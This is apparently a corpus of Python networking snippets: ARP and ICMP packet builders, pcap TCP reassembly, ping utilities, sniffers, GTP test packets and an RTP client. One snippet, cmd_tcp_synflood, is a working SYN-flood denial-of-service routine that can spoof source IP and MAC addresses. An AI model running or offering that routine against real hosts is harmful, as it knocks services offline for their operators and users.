reply as real interface on virtual machine\n    if dp.id in LAN_TYPE_FORWARDERS and dp.id == 0xa:\n        eth_src = \"08:00:27:e1:e4:83\"\n    elif dp.id in LAN_TYPE_FORWARDERS and dp.id == 0xc:\n        eth_src = \"08:00:27:52:fb:7d\"\n\n    ##If no src_mac was provided we generate one from Datapath ID of forwarder that received message\n    ##If Datapath ID starts with zeros we cannot use it as legit MAC address\n    ##Second hex digit must be 2 to indicate 
localy administered non-multicast address\n if eth_src == None:\n str_hex_dpid = str(hex(dp.id)).rstrip('L').lstrip('0x')\n if len(str_hex_dpid) < 11:\n eth_src ='02'\n for i in range(10-len(str_hex_dpid)):\n eth_src += '0'\n eth_src += str_hex_dpid\n else:\n eth_src = dp.id\n\n eth = ethernet.ethernet(eth_dst, eth_src, ether.ETH_TYPE_ARP)\n arp_req = arp.arp_ip(arp_code, eth_src, ip_sender, eth_target, ip_target)\n\n pkt = packet.Packet()\n pkt.add_protocol(eth)\n pkt.add_protocol(arp_req)\n pkt.serialize()\n actions=[parser.OFPActionOutput(port_out)]\n out=parser.OFPPacketOut(datapath=dp, buffer_id=ofp.OFP_NO_BUFFER, in_port=ofp.OFPP_CONTROLLER, actions=actions, data=pkt.data)\n dp.send_msg(out)", "def send_error(self, conn, msg, srcif):\n message = {}\n message[SRCE], message[DEST] = ('.').join(srcif.split('.', 3)[:3]) + '.1', msg[SRCE]\n message[TYPE] = NRTE\n message[MESG] = {}\n sending_msg = json.dumps(message).encode()\n conn.sendall(sending_msg)\n return True", "def _tcp_reassemble(self, number, src_addr, dst_addr, tcp):\n \n pld = tcp.message[tcp.header_len : tcp.header_len + tcp.segement_len]\n src_socket = (src_addr, tcp.src_port)\n dst_socket = (dst_addr, tcp.dst_port)\n sockets = (src_socket, dst_socket)\n\n def debug_cond(tcp):\n return False\n return True\n return tcp.stream_index == 710\n\n #check the other side of the tcp connection, flush the complete pdu to the msg_list\n if sockets in _tcp_buf and tcp.ack_num != _tcp_buf[sockets].ack: \n self._tcp_flush(sockets)\n del _tcp_buf[sockets]\n if debug_cond(tcp):\n print \"get a new http, decide by %d\" % number\n\n if debug_cond(tcp):\n print \"_tcp_reassemble, number= %d, sequence_num=%d, ack = %d, pldlen=%d, msglen=%d, opt_paddings=%d, iptotal_len=%d, ipheader_len=%d, tcpheader_len=%d\" % (number, tcp.ack_num, len(pld), len(tcp.message), len(tcp.opt_paddings), tcp.ip.total_len, tcp.ip.header_len, tcp.header_len)\n pass\n\n if pld:\n if not sockets in _tcp_buf:\n if debug_cond(tcp):\n print \" add a new message, begin with %d\" % number\n _tcp_buf[sockets] = Message({\n 'pcap_num_list': [],\n 'ts': self.packet_headers[number]['ts'] - self._ts_base,\n 'ip_proto': 'TCP',\n 'src_addr': src_addr,\n 'dst_addr': dst_addr,\n 'src_port': tcp.src_port,\n 'dst_port': tcp.dst_port,\n #'seq': tcp.sequence_num, HUA tcp disorder will generate error\n 'tcp_list': [],\n 'seq_min': 0,\n 'ack': tcp.ack_num,\n 'payload': [],\n 'stream_index': tcp.stream_index, # HUA add a stream index to message\n 'direction': tcp.direction, # HUA add to determin the http is request or response\n 'flag': False\n })\n try:\n _tcp_buf[sockets].ts = self.packet_headers[number]['ts'] - self._ts_base # HUA we should update ts and set it to last\n except:\n print number\n print len(self.packet_headers)\n _tcp_buf[sockets].pcap_num_list.append(number)\n if number == 2246:\n _tcp_buf[sockets].flag = False\n _tcp_buf[sockets].tcp_list.append(tcp)\n #offset = tcp.sequence_num - _tcp_buf[sockets].seq # seq 是相对的\n #_tcp_buf[sockets].payload[offset:offset+len(pld)] = list(pld)", "def shortest_forwarding(self, msg, eth_type, ip_src, ip_dst):\r\n\r\n pkt = packet.Packet(msg.data)\r\n icmp_pkt = pkt.get_protocol(icmp.icmp)\r\n if icmp_pkt:\r\n ip_protocol = 1\r\n print 'icmp processing!'\r\n self.icmp_forwarding(msg, ip_protocol, eth_type, ip_src, ip_dst)\r\n return\r\n datapath = msg.datapath\r\n in_port = msg.match['in_port']\r\n tcp_pkt = None\r\n udp_pkt = None\r\n dst_port = self.awareness.get_host_location(ip_dst)[1]\r\n tcp_pkt = pkt.get_protocol(tcp.tcp)\r\n udp_pkt 
= pkt.get_protocol(udp.udp)\r\n L4_port = None\r\n flow_info = None\r\n flow_info_reverse = None\r\n\r\n # if not icmp packet,Get ip_proto and L4 port number.\r\n result = self.get_sw(datapath.id, in_port, ip_src, ip_dst) # result = (src_sw, dst_sw)\r\n if (result):\r\n src_sw, dst_sw = result[0], result[1]\r\n if setting.enable_Flow_Entry_L4Port:\r\n ip_proto, L4_port, Flag = self.get_L4_info(tcp_pkt, udp_pkt)\r\n if result:\r\n if dst_sw:\r\n src_sw, dst_sw = result[0], result[1]\r\n if ip_proto and L4_port and Flag:\r\n if ip_proto == 6:\r\n L4_Proto = 'TCP'\r\n elif ip_proto == 17:\r\n L4_Proto = 'UDP'\r\n else:\r\n pass\r\n L4_port.reverse()\r\n flow_info = (eth_type, ip_src, ip_dst, in_port, ip_proto, Flag, L4_port)\r\n flow_info_reverse = (eth_type, ip_dst, ip_src, dst_port, ip_proto, Flag, L4_port)\r\n else:\r\n flow_info = (eth_type, ip_src, ip_dst, in_port)\r\n flow_info_reverse = (eth_type, ip_dst, ip_src, dst_port)\r\n else:\r\n flow_info = (eth_type, ip_src, ip_dst, in_port)\r\n flow_info_reverse = (eth_type, ip_dst, ip_src, dst_port)\r\n info = (ip_src, ip_dst, ip_proto, L4_port[0], L4_port[1])\r\n info2 = (ip_dst, ip_src, ip_proto, L4_port[1], L4_port[0])\r\n if (info in self.register) and (info2 in self.register):\r\n return\r\n self.register.append(info)\r\n self.register.append(info2)\r\n # dst_host and src_host link one same switch\r\n if self.newComingFlows['src'].has_key(ip_src):\r\n self.newComingFlows['src'][ip_src] += 1\r\n else:\r\n self.newComingFlows['src'][ip_src] = 1\r\n if self.newComingFlows['dst'].has_key(ip_dst):\r\n self.newComingFlows['dst'][ip_dst] += 1\r\n else:\r\n self.newComingFlows['dst'][ip_dst] = 1\r\n flowDemand = self._bandwidth_demand(ip_src, ip_dst)\r\n if src_sw == dst_sw:\r\n self.send_packet_out(datapath, msg.buffer_id, in_port, dst_port, msg.data)\r\n else:\r\n if not (str(src_sw).startswith('3') and str(dst_sw).startswith('3')):\r\n return\r\n paths = self.awareness.shortest_paths.get(src_sw).get(dst_sw)\r\n self.graph = self.monitor.graph\r\n path = self._select_paths1(flowDemand, paths)\r\n\r\n # path = self.get_path(src_sw, dst_sw, weight=self.weight)\r\n # Path has already been calculated, just get it.\r\n if path == None:\r\n return\r\n path.reverse()\r\n try:\r\n # bucket=self.swToSegments(path)\r\n # self.Segment_forwarding(flow_info,bucket)\r\n self.install_flow(self.datapaths, self.awareness.link_to_port, path, flow_info_reverse, msg.buffer_id,\r\n ip_dst, ip_src, msg.data)\r\n path.reverse()\r\n if len(flow_info_reverse) == 7:\r\n L4_port.reverse()\r\n self.install_flow(self.datapaths, self.awareness.link_to_port, path, flow_info, msg.buffer_id, ip_src,\r\n ip_dst, msg.data)\r\n # self.compute_runing_time()\r\n\r\n except:\r\n self.flood(msg)", "def tcpdump(timeout, q, interface):\t\n\tlogging.debug('tcpdump -s 1024 -lqnAt tcp port 80 -i eth0')\n\t# tcpdump -s 1024 -lqnAt tcp port 80\n\t\t\n\tcommand = Command(['/usr/sbin/tcpdump', '-s 1024', '-lnAq', '-i', interface], timeout)\n\tcommand.run()\n\n\t# when it's executing here, the results have been available\n\t# print command.out\n\n\tif command.out is not None:\n\t\t# pattern = \"time=([0-9]+\\.[0-9]+) ms\"\n\t\tip_pattern = \"IP ([0-9]+.[0-9]+.[0-9]+.[0-9]+).[0-9]+ > [0-9]+.[0-9]+.[0-9]+.[0-9]+.[0-9]\"\n\t\tgoogle_pattern = \"domain=.google.com\"\n\t\tlines = command.out.split('\\n')\n\t\tlast_ip = None\n\n\t\t# first time scan for google's return ip\n\t\tfor line in lines:\n\t\t\tip_src = re.search(ip_pattern, line)\n\t\t\tif ip_src is not None:\n\t\t\t\tlast_ip = 
ip_src.group(1)\n\t\t\tif re.search(google_pattern, line):\n\t\t\t\tprint last_ip\n\t\t\t\tbreak\n\n\t\tgEntries = []\n\t\tif last_ip is not None:\n\t\t\t\n\t\t\t# second time scan parse tcpdump for query entries\n\t\t\tfor line in lines:\n\t\t\t\tlast_ip_pos = re.search(last_ip, line)\n\t\t\t\tif last_ip_pos is None:\n\t\t\t\t\tcontinue\n\t\t\t\n\t\t\t\tif line.index('>') > last_ip_pos.start():\n\t\t\t\t\t# from remote to this place\n\t\t\t\t\ttraffic_type = 1\t\t\t\n\t\t\t\telse:\n\t\t\t\t\t# out to remote\n\t\t\t\t\ttraffic_type = 0\n\t\t\t\n\t\t\t\ttime_pattern = \"([0-9]+:[0-9]+:[0-9]+.[0-9]+) IP\"\n\t\t\t\ttimestamp = re.search(time_pattern, line)\n\t\t\t\tif timestamp is not None:\n\t\t\t\t\ttime_str = timestamp.group(1)\n\t\t\t\t\th, m, s, ms = map(int, re.split(r'[.:]+', time_str))\n\t\t\t\t\ttimestamp_delta = timedelta(hours=h, minutes=m, seconds=s, microseconds=ms)\n\t\t\t\t\tgEntries.append( (timestamp_delta, traffic_type) )\n\t\t\t\telse:\n\t\t\t\t\tgEntries.append( (None, -1))\n\n\t\tq.put((command.returncode, last_ip, gEntries))\n\t\treturn", "def writer(self):\n #while self.alive:\n try:\n icmpreq = ethernet.Ethernet(src_s=\"dc:a6:32:00:a7:8b\", dst_s=\"ec:84:b4:3e:c8:20\", type=ethernet.ETH_TYPE_IP) +\\\n ip.IP(p=ip.IP_PROTO_ICMP, src_s=\"192.168.1.35\", dst_s=\"172.217.166.110\") +\\\n icmp.ICMP(type=8) +\\\n icmp.ICMP.Echo(id=1, ts=123456789, body_bytes=b\"12345678901234567890\")\n self.serial.write(icmpreq.bin()+b'~')\n except socket.error as msg:\n print(msg)\n self.stop()", "def receive_one_ping(my_socket, id, timeout):\n time_left = timeout\n while True:\n started_select = time.time()\n what_ready = select.select([my_socket], [], [], time_left)\n how_long_in_select = (time.time() - started_select)\n if what_ready[0] == []: # Timeout\n return\n\n time_received = time.time()\n rec_packet, addr = my_socket.recvfrom(1024)\n icmp_header = rec_packet[20:28]\n icmp_type, code, checksum, packet_id, sequence = struct.unpack(\n \"bbHHh\", icmp_header\n )\n # Filters out the echo request itself. \n # This can be tested by pinging 127.0.0.1 \n # You'll see your own request\n if icmp_type != 8 and packet_id == id:\n bytes_in_double = struct.calcsize(\"d\")\n time_sent = struct.unpack(\"d\", rec_packet[28:28 + bytes_in_double])[0]\n return time_received - time_sent\n\n time_left = time_left - how_long_in_select\n if time_left <= 0:\n return", "def sniff_online(args):\n print('viewer: listening on ' + args.interface)\n\n try:\n sniffer = pcapy.open_live(args.interface, 65536, 1, 1)\n sniffer.setfilter('icmp')\n except Exception as e:\n print(e)\n sys.exit(-1)\n\n if not args.count:\n count = True\n else:\n count = args.count\n\n while count:\n (header, packet) = sniffer.next()\n if header:\n tts = header.getts()\n ret = parse_ICMP_Echo(tts[0] + tts[1] / 1000000, packet)\n\n if ret and args.count:\n count -= 1", "def ping(msg):\n msg = msg[0:1] + 'O' + msg[2:]\n ircsocket.send(bytes(msg, 'utf-8'))\n sendmsg('This message should be eaten by irc. 
QQ.')", "def create_icmp_server_socket():\n sock = socket.socket(socket.AF_INET, socket.SOCK_RAW, socket.IPPROTO_ICMP)\n sock.bind((\"0.0.0.0\", 0))\n sock.setsockopt(socket.SOL_IP, socket.IP_HDRINCL, 1)\n return sock", "def ship_tnm(tnu, tnm):\n user_string = \"{user} ({host}:{port})\".format(user=tnu.name, host=tnu.host, port=str(tnu.port))\n sender = socket.socket()\n sender.settimeout(1)\n try:\n sender.connect((tnu.host, tnu.port))\n sender.send(tnm.ciphertext)\n sender.shutdown(socket.SHUT_RDWR)\n except (socket.error, socket.timeout) as e:\n # Commented out to save it for the message queue later.\n # print(\"Unable to reach {user}: {reason}\".format(user=user_string, reason=str(e)))\n if tnm.ciphertext:\n # Only log for real messages, not status checks\n logger.error(\"Failed to send a message to {user}: {reason}\".format(user=user_string, reason=str(e)))\n sender.close()\n return False\n else:\n if tnm.ciphertext:\n logger.info(\"Sent a message to {user}.\".format(user=user_string))\n filesystem.write_message(tnu.name, tnm)\n sender.close()\n return True", "def ping_once(sock, data_size=None, id=None):\n\n if data_size is None:\n data_size = 64\n \n if id is None:\n id = 1\n \n seq = 1999 # not really used here, but the TV show Space 1999! was pretty awesome when I was a kid.\n\n payload, packet = create_packet(id, seq, data_size)\n\n try:\n # Send it, record the time.\n sock.sendall(packet)\n time_send = now()\n\n # Receive response, record time.\n msg_recv = sock.recv(0xffff)\n time_recv = now()\n\n # Extract packet data.\n ip = dpkt.ip.IP(msg_recv)\n\n # Process results.\n is_same_data = (payload == ip.icmp.echo.data)\n time_ping = (time_recv - time_send)\n echo_id = ip.icmp.echo.id\n\n except socket.timeout:\n is_same_data = False\n time_ping = None\n echo_id = None\n\n # Done.\n result = {'time_ping':time_ping,\n 'data_size':data_size,\n 'timeout':sock.gettimeout()*1000., # convert from seconds to milliseconds\n 'is_same_data':is_same_data,\n 'id':id,\n 'echo_id':echo_id}\n\n return result", "def compute_tcp_acks_retrans(pcap_filepath, connections, inverse_conns, ts_syn_timeout=6.0, ts_timeout=3600.0):\n print(\"Computing TCP ack sizes for\", pcap_filepath)\n nb_acks = {co.C2S: {}, co.S2C: {}}\n acks = {}\n # Avoid processing packets that do not belong to any analyzed TCP connection\n black_list = set()\n pcap_file = open(pcap_filepath)\n pcap = dpkt.pcap.Reader(pcap_file)\n count = 0\n try:\n for ts, buf in pcap:\n ts_delta = get_ts_delta(ts)\n count += 1\n if count % 100000 == 0:\n print(count)\n # Check if linux cooked capture\n if pcap.datalink() == dpkt.pcap.DLT_LINUX_SLL:\n eth = dpkt.sll.SLL(buf)\n else:\n eth = dpkt.ethernet.Ethernet(buf)\n if type(eth.data) == dpkt.ip.IP or type(eth.data) == dpkt.ip6.IP6:\n ip = eth.data\n if type(ip.data) == dpkt.tcp.TCP:\n tcp = ip.data\n fin_flag = (tcp.flags & dpkt.tcp.TH_FIN) != 0\n syn_flag = (tcp.flags & dpkt.tcp.TH_SYN) != 0\n rst_flag = (tcp.flags & dpkt.tcp.TH_RST) != 0\n ack_flag = (tcp.flags & dpkt.tcp.TH_ACK) != 0\n\n saddr, daddr, sport, dport = get_ips_and_ports(eth, ip, tcp)\n if syn_flag and not ack_flag and not fin_flag and not rst_flag:\n process_first_syn(ts_delta, acks, nb_acks, connections, tcp, ip, saddr, daddr, sport, dport, black_list, inverse_conns,\n ts_syn_timeout, ts_timeout)\n\n elif (saddr, sport, daddr, dport) in black_list:\n continue\n\n elif syn_flag and ack_flag and not fin_flag and not rst_flag:\n process_syn_ack(ts_delta, acks, nb_acks, connections, tcp, saddr, ip, daddr, sport, dport, black_list, 
inverse_conns,\n ts_syn_timeout, ts_timeout)\n\n elif not syn_flag and not rst_flag and ack_flag:\n if (saddr, sport, daddr, dport) in acks:\n process_pkt_from_client(ts_delta, acks, nb_acks, connections, tcp, ip, saddr, daddr, sport, dport, fin_flag)\n\n elif (daddr, dport, saddr, sport) in acks:\n process_pkt_from_server(ts_delta, acks, nb_acks, connections, tcp, ip, saddr, daddr, sport, dport, fin_flag)\n else:\n # Silently ignore those packets\n # print(saddr, sport, daddr, dport, \"haven't seen beginning...\")\n continue\n\n except dpkt.NeedData as e:\n print(e, \": trying to continue...\", file=sys.stderr)\n finally:\n pcap_file.close()\n\n return nb_acks", "def cmd_tcp_synflood(ip, interface, count, port, forgemac, forgeip, verbose):\n\n conf.verb = False\n\n if interface:\n conf.iface = interface\n\n layer2 = Ether()\n\n layer3 = IP()\n layer3.dst = ip\n\n layer4 = TCP()\n layer4.dport = port\n\n pkt = layer2 / layer3 / layer4\n\n counter = 0\n\n print(\"Please, remember to block your RST responses\", file=sys.stderr)\n\n while True:\n if forgeip:\n pkt[IP].src = \"%s.%s\" %(pkt[IP].src.rsplit('.', maxsplit=1)[0], randint(1, 254))\n if forgemac:\n pkt[Ether].src = RandMAC()\n\n pkt[TCP].sport = randint(10000, 65000)\n\n if verbose:\n print(pkt.summary())\n else:\n print('.', end='')\n sys.stdout.flush()\n\n sendp(pkt)\n counter += 1\n\n if count != 0 and counter == count:\n break\n\n return True", "def test_notice_replier_should_have_saved_request_ip_mac(arp):\n\n # Sender of this reply should have saved the src MAC and src IP of the request\n e = Ether(src='00:11:22:aa:bb:cd', dst='00:11:22:aa:bb:ca')\n a = ARP(hwsrc='00:11:22:aa:bb:cd', hwdst='00:11:22:aa:bb:ca', psrc='10.0.0.1', pdst='10.0.0.2', op='is-at')\n response = arp.receive_packet(e / a)\n assert type(response) is PermittedResponse\n\n # Sender of previous reply should not do a new request\n e = Ether(src='00:11:22:aa:bb:cd', dst='ff:ff:ff:ff:ff:ff')\n a = ARP(hwsrc='00:11:22:aa:bb:cd', hwdst='00:00:00:00:00:00', psrc='10.0.0.1', pdst='10.0.0.2', op='who-has')\n arp.receive_packet(e / a)\n response = arp.receive_packet(e / a)\n\n assert type(response) is NoticeRespone", "def gtp_packets(\n self, type='fdir', tunnel_pkt='gtpu', inner_L3='ipv4',\n match_opt='matched', chk='', teid=0xF):\n pkts = []\n pkts_gtpc_pay = {'IPV4/GTPC': 'Ether()/IP()/UDP(%sdport=2123)/GTP_U_Header(teid=%s)/Raw(\"X\"*20)' % (chk, teid),\n 'IPV6/GTPC': 'Ether()/IPv6()/UDP(%sdport=2123)/GTP_U_Header(teid=%s)/Raw(\"X\"*20)' % (chk, teid)}\n\n pkts_gtpu_pay = {'IPV4/GTPU': 'Ether()/IP()/UDP(%sdport=2152)/GTP_U_Header(teid=%s)/Raw(\"X\"*20)' % (chk, teid),\n 'IPV6/GTPU': 'Ether()/IPv6()/UDP(%sdport=2152)/GTP_U_Header(teid=%s)/Raw(\"X\"*20)' % (chk, teid)}\n\n pkts_gtpu_ipv4 = {'IPV4/GTPU/IPV4': 'Ether()/IP()/UDP(%sdport=2152)/GTP_U_Header(teid=%s)/IP()/Raw(\"X\"*20)' % (chk, teid),\n 'IPV4/GTPU/IPV4/FRAG': 'Ether()/IP()/UDP(%sdport=2152)/GTP_U_Header(teid=%s)/IP(frag=5)/Raw(\"X\"*20)' % (chk, teid),\n 'IPV4/GTPU/IPV4/UDP': 'Ether()/IP()/UDP(%sdport=2152)/GTP_U_Header(teid=%s)/IP()/UDP()/Raw(\"X\"*20)' % (chk, teid),\n 'IPV4/GTPU/IPV4/TCP': 'Ether()/IP()/UDP(%sdport=2152)/GTP_U_Header(teid=%s)/IP()/TCP()/Raw(\"X\"*20)' % (chk, teid),\n 'IPV4/GTPU/IPV4/SCTP': 'Ether()/IP()/UDP(%sdport=2152)/GTP_U_Header(teid=%s)/IP()/SCTP()/Raw(\"X\"*20)' % (chk, teid),\n 'IPV4/GTPU/IPV4/ICMP': 'Ether()/IP()/UDP(%sdport=2152)/GTP_U_Header(teid=%s)/IP()/ICMP()/Raw(\"X\"*20)' % (chk, teid),\n 'IPV6/GTPU/IPV4': 
'Ether()/IPv6()/UDP(%sdport=2152)/GTP_U_Header(teid=%s)/IP()/Raw(\"X\"*20)' % (chk, teid),\n 'IPV6/GTPU/IPV4/FRAG': 'Ether()/IPv6()/UDP(%sdport=2152)/GTP_U_Header(teid=%s)/IP(frag=5)/Raw(\"X\"*20)' % (chk, teid),\n 'IPV6/GTPU/IPV4/UDP': 'Ether()/IPv6()/UDP(%sdport=2152)/GTP_U_Header(teid=%s)/IP()/UDP()/Raw(\"X\"*20)' % (chk, teid),\n 'IPV6/GTPU/IPV4/TCP': 'Ether()/IPv6()/UDP(%sdport=2152)/GTP_U_Header(teid=%s)/IP()/TCP()/Raw(\"X\"*20)' % (chk, teid),\n 'IPV6/GTPU/IPV4/SCTP': 'Ether()/IPv6()/UDP(%sdport=2152)/GTP_U_Header(teid=%s)/IP()/SCTP()/Raw(\"X\"*20)' % (chk, teid),\n 'IPV6/GTPU/IPV4/ICMP': 'Ether()/IPv6()/UDP(%sdport=2152)/GTP_U_Header(teid=%s)/IP()/ICMP()/Raw(\"X\"*20)' % (chk, teid)}\n\n pkts_gtpu_ipv6 = {'IPV4/GTPU/IPV6/FRAG': 'Ether()/IP()/UDP(%sdport=2152)/GTP_U_Header(teid=%s)/IPv6()/IPv6ExtHdrFragment()/Raw(\"X\"*20)' % (chk, teid),\n 'IPV4/GTPU/IPV6': 'Ether()/IP()/UDP(%sdport=2152)/GTP_U_Header(teid=%s)/IPv6()/Raw(\"X\"*20)' % (chk, teid),\n 'IPV4/GTPU/IPV6/UDP': 'Ether()/IP()/UDP(%sdport=2152)/GTP_U_Header(teid=%s)/IPv6()/UDP()/Raw(\"X\"*20)' % (chk, teid),\n 'IPV4/GTPU/IPV6/TCP': 'Ether()/IP()/UDP(%sdport=2152)/GTP_U_Header(teid=%s)/IPv6()/TCP()/Raw(\"X\"*20)' % (chk, teid),\n 'IPV4/GTPU/IPV6/SCTP': 'Ether()/IP()/UDP(%sdport=2152)/GTP_U_Header(teid=%s)/IPv6()/SCTP()/Raw(\"X\"*20)' % (chk, teid),\n 'IPV4/GTPU/IPV6/ICMP': 'Ether()/IP()/UDP(%sdport=2152)/GTP_U_Header(teid=%s)/IPv6(nh=58)/ICMP()/Raw(\"X\"*20)' % (chk, teid),\n 'IPV6/GTPU/IPV6/FRAG': 'Ether()/IPv6()/UDP(%sdport=2152)/GTP_U_Header(teid=%s)/IPv6()/IPv6ExtHdrFragment()/Raw(\"X\"*20)' % (chk, teid),\n 'IPV6/GTPU/IPV6': 'Ether()/IPv6()/UDP(%sdport=2152)/GTP_U_Header(teid=%s)/IPv6()/Raw(\"X\"*20)' % (chk, teid),\n 'IPV6/GTPU/IPV6/UDP': 'Ether()/IPv6()/UDP(%sdport=2152)/GTP_U_Header(teid=%s)/IPv6()/UDP()/Raw(\"X\"*20)' % (chk, teid),\n 'IPV6/GTPU/IPV6/TCP': 'Ether()/IPv6()/UDP(%sdport=2152)/GTP_U_Header(teid=%s)/IPv6()/TCP()/Raw(\"X\"*20)' % (chk, teid),\n 'IPV6/GTPU/IPV6/SCTP': 'Ether()/IPv6()/UDP(%sdport=2152)/GTP_U_Header(teid=%s)/IPv6()/SCTP()/Raw(\"X\"*20)' % (chk, teid),\n 'IPV6/GTPU/IPV6/ICMP': 'Ether()/IPv6()/UDP(%sdport=2152)/GTP_U_Header(teid=%s)/IPv6(nh=58)/ICMP()/Raw(\"X\"*20)' % (chk, teid)}\n\n if match_opt == 'matched':\n if tunnel_pkt is 'gtpc' and inner_L3 is None:\n pkts = pkts_gtpc_pay\n if tunnel_pkt is 'gtpu' and inner_L3 is None:\n pkts = pkts_gtpu_pay\n if tunnel_pkt is 'gtpu' and inner_L3 is 'ipv4':\n pkts = pkts_gtpu_ipv4\n if tunnel_pkt is 'gtpu' and inner_L3 is 'ipv6':\n pkts = pkts_gtpu_ipv6\n\n if match_opt == 'not matched':\n if type is 'fdir':\n if tunnel_pkt is 'gtpc' and inner_L3 is None:\n pkts = dict(\n pkts_gtpu_pay.items() +\n pkts_gtpu_ipv4.items() +\n pkts_gtpu_ipv6.items())\n if tunnel_pkt is 'gtpu' and inner_L3 is None:\n pkts = dict(\n pkts_gtpc_pay.items() +\n pkts_gtpu_ipv4.items() +\n pkts_gtpu_ipv6.items())\n if tunnel_pkt is 'gtpu' and inner_L3 is 'ipv4':\n pkts = dict(\n pkts_gtpc_pay.items() +\n pkts_gtpu_pay.items() +\n pkts_gtpu_ipv6.items())\n if tunnel_pkt is 'gtpu' and inner_L3 is 'ipv6':\n pkts = dict(\n pkts_gtpc_pay.items() +\n pkts_gtpu_pay.items() +\n pkts_gtpu_ipv4.items())\n if type is 'clfter':\n if tunnel_pkt is 'gtpc':\n pkts = dict(\n pkts_gtpu_pay.items() +\n pkts_gtpu_ipv4.items() +\n pkts_gtpu_ipv6.items())\n if tunnel_pkt is 'gtpu':\n pkts = pkts_gtpc_pay\n return pkts", "def icmp_ping(ip_addr, timeout = 6, count = 1024):\n for i in range(count):\n print('Ping wait:')\n try:\n delay = ping_wait(ip_addr, timeout)\n except socket.gaierror as e:\n 
print('Failed. (socket error: %s)' % e[1])\n break\n\n if delay == None:\n print('Failed. (timeout within %s second.)' % timeout)\n else:\n print('get ICMP in %0.4f ms' % (delay * 1000))", "def traff_from_extgwrtr(extgwrtr_ip, fipsOftargetVMs, proto='all', jumbo=0):\n traff = gbpFabTraff()\n print 'FIPs of Target VMs == %s' % (fipsOftargetVMs)\n # List of FIPs ExtGWRtr will ping, ping_fips should be type List\n if isinstance(fipsOftargetVMs,dict):\n ping_fips = fipsOftargetVMs.values() \n if isinstance(fipsOftargetVMs,list):\n ping_fips = fipsOftargetVMs\n if not isinstance(fipsOftargetVMs,list):\n ping_fips = [fipsOftargetVMs]\n attemptall = 1\n if proto == 'all':\n while attemptall < max_traff_attempts:\n if jumbo == 1:\n results_icmp = traff.test_regular_icmp(\n extgwrtr_ip, ping_fips, pkt_size='9000')\n else:\n results_icmp = traff.test_regular_icmp(extgwrtr_ip, ping_fips)\n results_tcp = traff.test_regular_tcp(extgwrtr_ip, ping_fips)\n if results_icmp != 1 and results_tcp != 1:\n retval = {'ICMP': results_icmp.keys(), 'TCP': results_tcp.keys()}\n elif results_icmp != 1:\n retval = {'ICMP': results_icmp.keys()}\n elif results_tcp != 1:\n retval = {'TCP': results_tcp.keys()}\n else:\n return 1\n if isinstance(retval,dict):\n print \"Wait for 10 secs before the next ICMP & TCP retry\\n\"\n sleep(10)\n attemptall += 1\n return retval\n if proto == 'icmp':\n if jumbo == 1:\n results_icmp = traff.test_regular_icmp(\n extgwrtr_ip, ping_fips, pkt_size='9000')\n else:\n results_icmp = traff.test_regular_icmp(extgwrtr_ip, ping_fips)\n attempt = 1\n while attempt < max_traff_attempts:\n if isinstance(results_icmp, dict):\n print \"Wait for 10 secs before the next ICMP retry\\n\"\n sleep(10)\n results_icmp = traff.test_regular_icmp(extgwrtr_ip, ping_fips)\n attempt += 1\n else:\n break\n if attempt == max_traff_attempts:\n return {'ICMP': results_icmp.keys()}\n if proto == 'tcp':\n results_tcp = traff.test_regular_tcp(extgwrtr_ip, ping_fips)\n retry = 1\n while retry < max_traff_attempts:\n if isinstance(results_tcp, dict):\n print \"Wait for 10 secs before the next TCP retry\\n\"\n sleep(10)\n results_tcp = traff.test_regular_tcp(extgwrtr_ip, ping_fips)\n retry += 1\n else:\n break\n if retry == max_traff_attempts:\n return {'TCP': results_tcp.keys()}", "def print_ofpt_echo_reply(msg):\n if len(msg.data.value) > 0:\n hexdump(msg.data.value)", "def sniff(self, func=None, timeout=None):\n msg = None\n while True:\n msg = self.shell.client.get_stream_packet(type_=\"packet\", timeout=timeout)\n if func is not None:\n func(msg)\n else:\n break\n return msg", "def sendpkt(self, data, retries=10): \n wire_data = self.pack(data).encode()\n self.logger.debug('sending> %s', data) \n self.s.send(wire_data)\n res = self.rxqueue.get()\n while res != '+':\n self.s.send(wire_data)\n res = self.rxqueue.get()\n retries -= 1\n if retries == 0:\n raise ValueError(\"retry fail\")", "def send_ping(my_socket, ip_addr, ID):\n ip = socket.gethostbyname(ip_addr)\n\n # Header is type (8), code (8), checksum (16), id (16), sequence (16)\n my_checksum = 0\n\n # Make a dummy heder with a 0 checksum\n # struct.pack(fmt, v1, v2, ...)\n # Return a string containing the values v1, v2, ... 
packed\n # according to the given format.\n # b:signed char, h:short 2, H:unsigned short 2\n header = struct.pack('bbHHh', ICMP_ECHO_REQUEST, 0, my_checksum, ID, 1)\n # struct.calcsize(fmt)\n # Return the size of the struct corresponding to the given format.\n byte_in_double = struct.calcsize(\"d\") # C type: double\n data = (192 - byte_in_double) * \"P\" # any char is OK, any length is OK\n data = struct.pack(\"d\", time.clock()) + data\n\n # Calculate the checksum on the data and the dummy header.\n my_checksum = get_checksum(header + data)\n\n # It's just easier to make up a new header than to stuff it into the dummy.\n # socket.htons(x)\n # Convert 16-bit positive integers from host to network byte order.\n header = struct.pack(\"bbHHh\", ICMP_ECHO_REQUEST, 0, socket.htons(my_checksum), ID, 1)\n packet = header + data\n # my_socket.sendto(packet, (ip, 1)) # getsockaddrarg() takes exactly 2 arguments\n my_socket.sendto(packet, (ip, 80)) # it seems that 0~65535 is OK (port?)", "def listen_rtp(self):\n one_frame_data = \"\"\n fault_mark = 'ack'\n currFrameNbr = 0\n last_time_fault = False\n self.cc = 0\n while True:\n try:\n if self.nak_num + self.ack_num != 0:\n self.lose_rate.setText(str(self.nak_num / (self.nak_num + self.ack_num))[:5])\n data = self.rtp_socket.recv(65536)\n if data:\n self.time_flag = 1\n rtpPacket = RtpPacket()\n rtpPacket.decode(data)\n currFrameNbr = rtpPacket.seqNum()\n marker = rtpPacket.getMarker()\n pt = rtpPacket.payloadType()\n\n self.cc = rtpPacket.get_csrc()\n if currFrameNbr != self.frame_num + 1: # order error\n fault_mark = 'nak 1'\n last_time_fault = True\n elif marker == 1 and not last_time_fault and fault_mark == 'ack': # end, no error\n # update some parameter\n self.ack_num += 1\n self.frame_num = 0\n self.curr_frame += 1\n self.percent = float(self.curr_frame / self.total_frame)\n self.video_slider.setValue(self.curr_frame)\n # send rtcp\n rtcpPacket = RtcpPacket()\n ssrc = random.randint(556, 10000)\n rtcpPacket.encode(2, 0, 1, 200, ssrc, 16, fault_mark.encode())\n packet = rtcpPacket.getPacket()\n\n self.rtcp_socket.sendto(packet, ('127.0.0.1', self.rtcp_port))\n if one_frame_data == \"\":\n one_frame_data = rtpPacket.getPayload()\n else:\n one_frame_data += rtpPacket.getPayload()\n\n 